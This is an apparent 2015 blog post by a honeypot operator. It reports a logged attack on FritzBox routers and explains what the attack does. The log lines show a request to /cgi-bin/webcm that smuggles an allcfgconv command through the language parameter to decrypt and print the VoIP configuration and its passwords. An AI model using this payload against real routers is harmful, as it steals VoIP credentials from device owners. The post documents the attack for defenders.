Mittwoch, 27. Mai 2015

Thats new: allcfgconf attack seen in the wild

According to my last log files from yesterday, there was an attack which included a allcfgconf statement

 beeswarm [mypyfwa] 2015-05-28 06:45:30.048870 get /cgi-bin/webcm                   ?getpage=../html/menus/menu2.html&var:lang=%26 allcfgconv -c voip -c -o - ../../         ../../../var/tmp/voip.cfg %26 http/1.1 162.248.50.159 US Path
The original logfile shows

 162.248.50.159 - - [27/May/2015:09:29:39 +0200] "GET /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26 allcfgconv -C voip -c -o - ../../../../../var/tmp/voip.cfg %26 HTTP/1.1" 404 493 "-" "-"
As I was unaware of the statement, I did a short research and the allcfgconf seems to be related to FritzBox see the manual here
So this attack targeted
  • -C voip : use the voip config type
  • -c : decrypt the password
  • -o : print the config